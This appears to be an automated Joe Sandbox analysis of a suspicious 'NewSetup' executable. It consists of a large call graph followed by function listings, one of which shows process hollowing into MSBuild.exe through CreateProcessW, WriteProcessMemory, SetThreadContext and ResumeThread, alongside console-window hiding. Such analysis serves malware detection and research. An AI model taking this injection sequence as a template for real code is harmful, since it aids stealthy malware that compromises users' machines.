20645->20664 20678 211d10 20645->20678 20646->20622 20647->20646 20686 227ddf 29 API calls 2 library calls 20647->20686 20652 214364 20651->20652 20653 21444e 20651->20653 20655 2143a5 20652->20655 20656 21437e 20652->20656 20660 214393 _Yarn 20652->20660 20687 212610 30 API calls 2 library calls 20653->20687 20658 21a663 codecvt 3 API calls 20655->20658 20656->20653 20657 21438a 20656->20657 20661 21a663 codecvt 3 API calls 20657->20661 20658->20660 20663 214424 codecvt 20660->20663 20688 227ddf 29 API calls 2 library calls 20660->20688 20661->20660 20663->20645 20665 211788 _strlen 20664->20665 20668 211833 20665->20668 20675 21180d 20665->20675 20715 212c50 20665->20715 20668->20675 20689 214460 20668->20689 20670 211b8e 20671 211b9f 20670->20671 20725 2138e0 39 API calls 2 library calls 20670->20725 20671->20645 20675->20670 20726 212f00 38 API calls std::ios_base::_Init 20675->20726 20727 2132c0 30 API calls 4 library calls 20675->20727 20728 22060c RaiseException 20675->20728 20676 21188d 20676->20675 20706 21def0 20676->20706 20679 211d5c 20678->20679 20680 214460 67 API calls 20679->20680 20681 211d70 20680->20681 20833 214b10 20681->20833 20684 212c50 39 API calls 20685 211deb 20684->20685 20685->20645 20687->20660 20729 21a9f4 20689->20729 20692 21a9f4 std::_Lockit::_Lockit 7 API calls 20693 2144b7 20692->20693 20735 21aa25 20693->20735 20694 2144d8 20704 214556 20694->20704 20742 2145f0 67 API calls 2 library calls 20694->20742 20695 21aa25 std::_Lockit::~_Lockit 2 API calls 20698 214585 20695->20698 20698->20676 20699 21453b 20700 214543 20699->20700 20701 214598 20699->20701 20743 21ab43 RaiseException _Yarn Concurrency::cancel_current_task 20700->20743 20744 213e50 RaiseException Concurrency::cancel_current_task 20701->20744 20704->20695 20707 21df17 20706->20707 20710 21df1e 20706->20710 20708 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20707->20708 20709 21e01c 20708->20709 20709->20676 20710->20707 20711 21df69 20710->20711 20713 21dfd0 20710->20713 20711->20707 20749 21dada 20711->20749 20713->20707 20752 22932d 20713->20752 20716 212d5a 20715->20716 20717 212c90 20715->20717 20716->20668 20718 212c50 39 API calls 20717->20718 20719 212cb3 20717->20719 20723 212cd7 20717->20723 20718->20723 20719->20716 20829 2138e0 39 API calls 2 library calls 20719->20829 20723->20719 20830 212f00 38 API calls std::ios_base::_Init 20723->20830 20831 2132c0 30 API calls 4 library calls 20723->20831 20832 22060c RaiseException 20723->20832 20725->20671 20726->20675 20727->20675 20728->20675 20730 21aa03 20729->20730 20732 21aa0a 20729->20732 20745 22810f 6 API calls 2 library calls 20730->20745 20733 21449a 20732->20733 20746 21fac8 EnterCriticalSection 20732->20746 20733->20692 20733->20694 20736 21aa2f 20735->20736 20737 22811d 20735->20737 20741 21aa42 20736->20741 20747 21fad6 LeaveCriticalSection 20736->20747 20748 2280f8 LeaveCriticalSection 20737->20748 20739 228124 20739->20694 20741->20694 20742->20699 20743->20704 20745->20733 20746->20733 20747->20741 20748->20739 20756 228d91 20749->20756 20751 21dae8 20751->20707 20753 229340 _Fputc 20752->20753 20803 22950e 20753->20803 20755 229355 _Fputc 20755->20707 20757 228da4 _Fputc 20756->20757 20760 228f33 20757->20760 20759 228db3 _Fputc 20759->20751 20761 228f3f ___scrt_is_nonwritable_in_current_image 20760->20761 20762 228f46 20761->20762 20763 228f6b 20761->20763 20801 227f78 29 API calls 2 library calls 20762->20801 20771 223315 EnterCriticalSection 20763->20771 20766 228f61 20766->20759 20767 228f7a 20772 228dc7 20767->20772 20771->20767 20773 228dfe 20772->20773 20774 228dec 20772->20774 20776 22f704 _Ungetc 29 API calls 20773->20776 20775 228eff _Fputc 66 API calls 20774->20775 20788 228df6 20775->20788 20777 228e05 20776->20777 20778 22f704 _Ungetc 29 API calls 20777->20778 20783 228e2d 20777->20783 20782 228e16 20778->20782 20779 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20780 228efd 20779->20780 20802 228fbb LeaveCriticalSection __fread_nolock 20780->20802 20781 228ee3 20785 228eff _Fputc 66 API calls 20781->20785 20782->20783 20786 22f704 _Ungetc 29 API calls 20782->20786 20783->20781 20784 22f704 _Ungetc 29 API calls 20783->20784 20787 228e60 20784->20787 20785->20788 20789 228e22 20786->20789 20790 228e83 20787->20790 20792 22f704 _Ungetc 29 API calls 20787->20792 20788->20779 20791 22f704 _Ungetc 29 API calls 20789->20791 20790->20781 20793 228e9b 20790->20793 20791->20783 20795 228e6c 20792->20795 20794 22f430 _Fputc 41 API calls 20793->20794 20796 228ead 20794->20796 20795->20790 20797 22f704 _Ungetc 29 API calls 20795->20797 20796->20788 20799 228c30 _Fputc 66 API calls 20796->20799 20798 228e78 20797->20798 20800 22f704 _Ungetc 29 API calls 20798->20800 20799->20796 20800->20790 20801->20766 20802->20766 20804 22951c 20803->20804 20810 229544 20803->20810 20805 22954b 20804->20805 20806 229529 20804->20806 20804->20810 20811 2295d1 20805->20811 20819 227f78 29 API calls 2 library calls 20806->20819 20810->20755 20812 2295dd ___scrt_is_nonwritable_in_current_image 20811->20812 20820 223315 EnterCriticalSection 20812->20820 20814 2295eb 20821 229585 20814->20821 20818 229583 20818->20755 20819->20810 20820->20814 20822 22e68b 30 API calls 20821->20822 20823 22959d 20822->20823 20824 229367 66 API calls 20823->20824 20825 2295bb 20824->20825 20826 22e774 64 API calls 20825->20826 20827 2295c7 20826->20827 20828 229620 LeaveCriticalSection __fread_nolock 20827->20828 20828->20818 20829->20716 20830->20723 20831->20723 20832->20723 20834 214b4f 20833->20834 20836 212c50 39 API calls 20834->20836 20837 214b6f 20834->20837 20836->20837 20840 214c3e 20837->20840 20844 212f00 38 API calls std::ios_base::_Init 20837->20844 20845 2132c0 30 API calls 4 library calls 20837->20845 20846 22060c RaiseException 20837->20846 20839 211de4 20839->20684 20840->20839 20843 2138e0 39 API calls 2 library calls 20840->20843 20843->20839 20844->20837 20845->20837 20846->20837 20849 2127ae 20847->20849 20848 2127d1 20852 2129de 20848->20852 20872 212f00 38 API calls std::ios_base::_Init 20848->20872 20873 2132c0 30 API calls 4 library calls 20848->20873 20874 22060c RaiseException 20848->20874 20849->20848 20850 212c50 39 API calls 20849->20850 20855 2127fa 20849->20855 20850->20855 20853 211028 20852->20853 20871 2138e0 39 API calls 2 library calls 20852->20871 20859 211110 20853->20859 20855->20848 20867 21cfb0 20855->20867 20860 21115c 20859->20860 20875 213c70 20860->20875 20865 212c50 39 API calls 20866 211031 20865->20866 20866->20574 20868 21cfbf 20867->20868 20869 21cfd2 _Yarn 20867->20869 20868->20848 20869->20868 20870 22932d 69 API calls 20869->20870 20870->20868 20871->20853 20872->20848 20873->20848 20874->20848 20876 21a9f4 std::_Lockit::_Lockit 7 API calls 20875->20876 20877 213caa 20876->20877 20878 21a9f4 std::_Lockit::_Lockit 7 API calls 20877->20878 20886 213ce5 20877->20886 20880 213cc4 20878->20880 20879 213daf 20881 21aa25 std::_Lockit::~_Lockit 2 API calls 20879->20881 20884 21aa25 std::_Lockit::~_Lockit 2 API calls 20880->20884 20883 211170 20881->20883 20882 21a663 codecvt 3 API calls 20885 213d4a 20882->20885 20894 213a00 20883->20894 20884->20886 20908 213e90 67 API calls 4 library calls 20885->20908 20886->20879 20886->20882 20888 213d7c 20909 21ecbf 39 API calls __Getctype 20888->20909 20890 213d97 20910 214010 65 API calls 3 library calls 20890->20910 20892 213da2 20911 21ab43 RaiseException _Yarn Concurrency::cancel_current_task 20892->20911 20896 213a3f 20894->20896 20895 213a5f 20901 213b2d 20895->20901 20947 212f00 38 API calls std::ios_base::_Init 20895->20947 20948 2132c0 30 API calls 4 library calls 20895->20948 20949 22060c RaiseException 20895->20949 20896->20895 20898 212c50 39 API calls 20896->20898 20899 213a85 20896->20899 20898->20899 20899->20895 20912 21cb40 20899->20912 20921 21cb32 20899->20921 20934 21cb22 20899->20934 20903 2111e4 20901->20903 20946 2138e0 39 API calls 2 library calls 20901->20946 20903->20865 20908->20888 20909->20890 20910->20892 20911->20879 20915 21cb63 20912->20915 20917 21cb5c 20912->20917 20913 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20914 21cc48 20913->20914 20914->20895 20915->20917 20918 21cc09 20915->20918 20919 21cba9 20915->20919 20917->20913 20918->20917 20920 22932d 69 API calls 20918->20920 20919->20917 20950 21c44d 20919->20950 20920->20917 20922 21cb39 20921->20922 20926 21cb85 20921->20926 20989 223329 LeaveCriticalSection 20922->20989 20924 21cb10 20924->20895 20925 21cb3e 20925->20895 20926->20924 20927 21cc09 20926->20927 20929 21cbea 20926->20929 20928 22932d 69 API calls 20927->20928 20930 21cbfb 20927->20930 20928->20930 20929->20930 20931 21c44d _Fputc 68 API calls 20929->20931 20932 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20930->20932 20931->20930 20933 21cc48 20932->20933 20933->20895 20935 21cb29 20934->20935 20941 21cb75 20934->20941 20990 223315 EnterCriticalSection 20935->20990 20937 21cb2e 20937->20895 20938 21cb79 20939 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20938->20939 20940 21cc48 20939->20940 20940->20895 20941->20938 20943 21cc09 20941->20943 20944 21cba9 20941->20944 20942 21c44d _Fputc 68 API calls 20942->20938 20943->20938 20945 22932d 69 API calls 20943->20945 20944->20938 20944->20942 20945->20938 20946->20903 20947->20895 20948->20895 20949->20895 20953 228bfc 20950->20953 20952 21c45d 20952->20917 20954 228c0f _Fputc 20953->20954 20957 228c5d 20954->20957 20956 228c1e _Fputc 20956->20952 20958 228c69 ___scrt_is_nonwritable_in_current_image 20957->20958 20959 228c72 20958->20959 20960 228c96 20958->20960 20979 227f78 29 API calls 2 library calls 20959->20979 20973 223315 EnterCriticalSection 20960->20973 20963 228c9f 20964 228cb4 20963->20964 20980 22f704 20963->20980 20966 228d20 20964->20966 20967 228d51 20964->20967 20987 227f78 29 API calls 2 library calls 20966->20987 20974 228c30 20967->20974 20970 228d5d 20988 228d89 LeaveCriticalSection __fread_nolock 20970->20988 20972 228c8b _Fputc 20972->20956 20973->20963 20975 228c3e 20974->20975 20976 228c4f 20974->20976 20977 234a37 _Fputc 66 API calls 20975->20977 20976->20970 20978 228c4a 20977->20978 20978->20970 20979->20972 20981 22f710 20980->20981 20982 22f725 20980->20982 20983 2276e4 __strnicoll 14 API calls 20981->20983 20982->20964 20984 22f715 20983->20984 20985 227dcf __strnicoll 29 API calls 20984->20985 20986 22f720 20985->20986 20986->20964 20987->20972 20988->20972 20989->20925 20990->20937 20991 2115d0 21002 211e40 20991->21002 20993 211702 codecvt 20994 2115db 20995 214320 30 API calls 20994->20995 20996 2116dd 20994->20996 20998 211750 103 API calls 20994->20998 21001 211d10 75 API calls 20994->21001 20995->20994 20996->20993 21008 227ddf 29 API calls 2 library calls 20996->21008 20998->20994 21001->20994 21003 211e63 _Fputc 21002->21003 21009 223558 21003->21009 21005 211e7c 21006 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21005->21006 21007 211e8c 21006->21007 21007->20994 21010 22356c _Fputc 21009->21010 21011 22358e 21010->21011 21012 2235b5 21010->21012 21024 227f78 29 API calls 2 library calls 21011->21024 21016 224d0d 21012->21016 21015 2235a9 _Fputc 21015->21005 21017 224d19 ___scrt_is_nonwritable_in_current_image 21016->21017 21025 223315 EnterCriticalSection 21017->21025 21019 224d27 21026 2246e2 21019->21026 21023 224d45 21023->21015 21024->21015 21025->21019 21038 22e68b 21026->21038 21028 224709 21045 223b31 21028->21045 21035 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21036 22477c 21035->21036 21037 224d5c LeaveCriticalSection __fread_nolock 21036->21037 21037->21023 21068 22e736 21038->21068 21040 22e6fe 21040->21028 21041 22e69c _Fputc 21041->21040 21075 22bf11 21041->21075 21044 22bed7 ___free_lconv_mon 14 API calls 21044->21040 21096 223a93 21045->21096 21048 223b57 21102 227f78 29 API calls 2 library calls 21048->21102 21050 223b74 21061 223861 21050->21061 21053 223b7f std::_Locinfo::_Locinfo_dtor 21053->21050 21056 2239f2 66 API calls 21053->21056 21057 223d73 21053->21057 21103 223790 39 API calls _Fputc 21053->21103 21104 223de1 29 API calls 21053->21104 21105 223e59 70 API calls 2 library calls 21053->21105 21106 223fb2 70 API calls 2 library calls 21053->21106 21056->21053 21107 227f78 29 API calls 2 library calls 21057->21107 21059 223d8d 21108 227f78 29 API calls 2 library calls 21059->21108 21062 22bed7 ___free_lconv_mon 14 API calls 21061->21062 21063 223871 21062->21063 21064 22e774 21063->21064 21065 22e77f 21064->21065 21067 22476a 21064->21067 21065->21067 21111 2285b8 21065->21111 21067->21035 21069 22e742 _Fputc 21068->21069 21070 22e76c 21069->21070 21071 22f704 _Ungetc 29 API calls 21069->21071 21070->21041 21072 22e75d 21071->21072 21082 23744f 21072->21082 21074 22e763 21074->21041 21076 22bf4f 21075->21076 21080 22bf1f __Getctype 21075->21080 21095 2276e4 14 API calls __strnicoll 21076->21095 21078 22bf3a RtlAllocateHeap 21079 22bf4d 21078->21079 21078->21080 21079->21044 21080->21076 21080->21078 21094 225877 EnterCriticalSection LeaveCriticalSection codecvt 21080->21094 21083 23745c 21082->21083 21085 237469 21082->21085 21091 2276e4 14 API calls __strnicoll 21083->21091 21088 237475 21085->21088 21092 2276e4 14 API calls __strnicoll 21085->21092 21087 237461 21087->21074 21088->21074 21089 237496 21093 227dcf 29 API calls __strnicoll 21089->21093 21091->21087 21092->21089 21093->21087 21094->21080 21095->21079 21097 223ac0 21096->21097 21098 223a9e 21096->21098 21110 2235fc 29 API calls 2 library calls 21097->21110 21109 227f78 29 API calls 2 library calls 21098->21109 21101 223ab9 21101->21048 21101->21050 21101->21053 21102->21050 21103->21053 21104->21053 21105->21053 21106->21053 21107->21059 21108->21050 21109->21101 21110->21101 21112 2285d1 21111->21112 21116 2285f8 21111->21116 21113 22f704 _Ungetc 29 API calls 21112->21113 21112->21116 21114 2285ed 21113->21114 21117 233e10 21114->21117 21116->21067 21118 233e1c ___scrt_is_nonwritable_in_current_image 21117->21118 21119 233e5d 21118->21119 21121 233ea3 21118->21121 21127 233e24 21118->21127 21157 227f78 29 API calls 2 library calls 21119->21157 21128 233868 EnterCriticalSection 21121->21128 21123 233ea9 21124 233ec7 21123->21124 21129 233bf4 21123->21129 21158 233f19 LeaveCriticalSection __fread_nolock 21124->21158 21127->21116 21128->21123 21130 233c1c 21129->21130 21133 233c3f __fread_nolock 21129->21133 21131 233c20 21130->21131 21134 233c7b 21130->21134 21173 227f78 29 API calls 2 library calls 21131->21173 21133->21124 21135 233c99 21134->21135 21174 2329a2 31 API calls __fread_nolock 21134->21174 21159 233f21 21135->21159 21139 233cb1 21141 233ce0 21139->21141 21142 233cb9 21139->21142 21140 233cf8 21143 233d61 WriteFile 21140->21143 21144 233d0c 21140->21144 21176 233f9e 45 API calls 4 library calls 21141->21176 21142->21133 21175 234365 6 API calls _Fputc 21142->21175 21148 233d83 GetLastError 21143->21148 21156 233cf3 21143->21156 21145 233d14 21144->21145 21146 233d4d 21144->21146 21149 233d39 21145->21149 21150 233d19 21145->21150 21166 2343cd 21146->21166 21148->21156 21178 234591 8 API calls 2 library calls 21149->21178 21150->21133 21153 233d22 21150->21153 21177 2344a8 7 API calls 2 library calls 21153->21177 21156->21133 21157->21127 21158->21127 21160 23744f __fread_nolock 29 API calls 21159->21160 21162 233f33 21160->21162 21161 233cab 21161->21139 21161->21140 21162->21161 21165 233f61 21162->21165 21179 223790 39 API calls _Fputc 21162->21179 21164 233f7b GetConsoleMode 21164->21161 21165->21161 21165->21164 21171 2343dc _Fputc 21166->21171 21167 23448d 21168 21a6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21167->21168 21169 2344a6 21168->21169 21169->21133 21170 23444c WriteFile 21170->21171 21172 23448f GetLastError 21170->21172 21171->21167 21171->21170 21172->21167 21173->21133 21174->21135 21175->21133 21176->21156 21177->21133 21178->21156 21179->21165 21180 2292d7 21181 22bed7 ___free_lconv_mon 14 API calls 21180->21181 21182 2292ef 21181->21182 21183 24a19e 21188 24a1d4 21183->21188 21184 24a321 GetPEB 21185 24a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21184->21185 21186 24a3da WriteProcessMemory 21185->21186 21185->21188 21187 24a41f 21186->21187 21189 24a424 WriteProcessMemory 21187->21189 21190 24a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21187->21190 21188->21184 21188->21185 21189->21187

                                                                                                      Executed Functions

                                                                                                      Function 0024A19E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0024A110,0024A100), ref: 0024A334
                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024A347
                                                                                                      • Wow64GetThreadContext.KERNEL32(000002B0,00000000), ref: 0024A365
                                                                                                      • ReadProcessMemory.KERNELBASE(000002B4,?,0024A154,00000004,00000000), ref: 0024A389
                                                                                                      • VirtualAllocEx.KERNELBASE(000002B4,?,?,00003000,00000040), ref: 0024A3B4
                                                                                                      • WriteProcessMemory.KERNELBASE(000002B4,00000000,?,?,00000000,?), ref: 0024A40C
                                                                                                      • WriteProcessMemory.KERNELBASE(000002B4,00400000,?,?,00000000,?,00000028), ref: 0024A457
                                                                                                      • WriteProcessMemory.KERNELBASE(000002B4,?,?,00000004,00000000), ref: 0024A495
                                                                                                      • Wow64SetThreadContext.KERNEL32(000002B0,02E40000), ref: 0024A4D1
                                                                                                      • ResumeThread.KERNELBASE(000002B0), ref: 0024A4E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                      • API String ID: 2687962208-3857624555
                                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                      • Instruction ID: 4c70094529421b203591c4c28ce74deee16b642f7017d832e671b41d48ac3042
                                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                      • Instruction Fuzzy Hash: 14B1087264028AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA51CB94
                                                                                                      Function 00211FB0 Relevance: 9.2, APIs: 6, Instructions: 200fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
                                                                                                      • CreateFileA.KERNELBASE ref: 00212036
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0021206B
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0021207A
                                                                                                      • _strlen.LIBCMT ref: 002120CD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 002121FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2911764282-0
                                                                                                      • Opcode ID: 6676fef68cae98eb6c7dcfecd823838551e440f93f4a9d9a3ca0390efd29a2a1
                                                                                                      • Instruction ID: eb532e572796b3f3e39991f8e5986cb4468f3245fd936298fc6b416a62fe4f8c
                                                                                                      • Opcode Fuzzy Hash: 6676fef68cae98eb6c7dcfecd823838551e440f93f4a9d9a3ca0390efd29a2a1
                                                                                                      • Instruction Fuzzy Hash: 9471B0B2C10219DBCB10DFA4DC487EEBBF5BF59310F140629F814A7391E73599A98BA1
                                                                                                      Function 00211000 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: p#
                                                                                                      • API String ID: 0-2363645462
                                                                                                      • Opcode ID: bf4605e4df8035d693e932f505804e83ac5b38a672c193e3e3b939ac63762eee
                                                                                                      • Instruction ID: b233f3c51b225250128b1bdbbfe21760c2046cf8daca7f26cf190fe2053748b0
                                                                                                      • Opcode Fuzzy Hash: bf4605e4df8035d693e932f505804e83ac5b38a672c193e3e3b939ac63762eee
                                                                                                      • Instruction Fuzzy Hash: 88215F33A201560B879C9F386C62077FB8ADB96560705573ADE129F2C1F531DD7082E4
                                                                                                      Function 002124B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetConsoleWindow.KERNELBASE ref: 002124DD
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 002124E6
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00212524
                                                                                                        • Part of subcall function 0021F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                        • Part of subcall function 0021F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                        • Part of subcall function 0021F11D: CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212567
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212578
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00212589
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0021259A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3956949563-0
                                                                                                      • Opcode ID: 4502fd2d6acd28e4df66800a0081558b14796bb00ada669411b740d1414b338a
                                                                                                      • Instruction ID: dac1beaca46dac0bb3313fe4ff1ee6f11dd78dce4d06aaa2fc5cf25f8b1415c0
                                                                                                      • Opcode Fuzzy Hash: 4502fd2d6acd28e4df66800a0081558b14796bb00ada669411b740d1414b338a
                                                                                                      • Instruction Fuzzy Hash: D221E6F2D50215ABDF10AF94DC46BDE7AF8AF14700F080165F50876281E7B695B4CBE2
                                                                                                      Function 0022CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 51 22cf0b-22cf17 52 22cfa9-22cfac 51->52 53 22cfb2 52->53 54 22cf1c-22cf2d 52->54 55 22cfb4-22cfb8 53->55 56 22cf3a-22cf53 LoadLibraryExW 54->56 57 22cf2f-22cf32 54->57 60 22cf55-22cf5e GetLastError 56->60 61 22cfb9-22cfc9 56->61 58 22cfd2-22cfd4 57->58 59 22cf38 57->59 58->55 63 22cfa6 59->63 64 22cf60-22cf72 call 230554 60->64 65 22cf97-22cfa4 60->65 61->58 62 22cfcb-22cfcc FreeLibrary 61->62 62->58 63->52 64->65 68 22cf74-22cf86 call 230554 64->68 65->63 68->65 71 22cf88-22cf95 LoadLibraryExW 68->71 71->61 71->65
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,456001D6,?,0022D01A,?,?,00000000), ref: 0022CFCC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3664257935-537541572
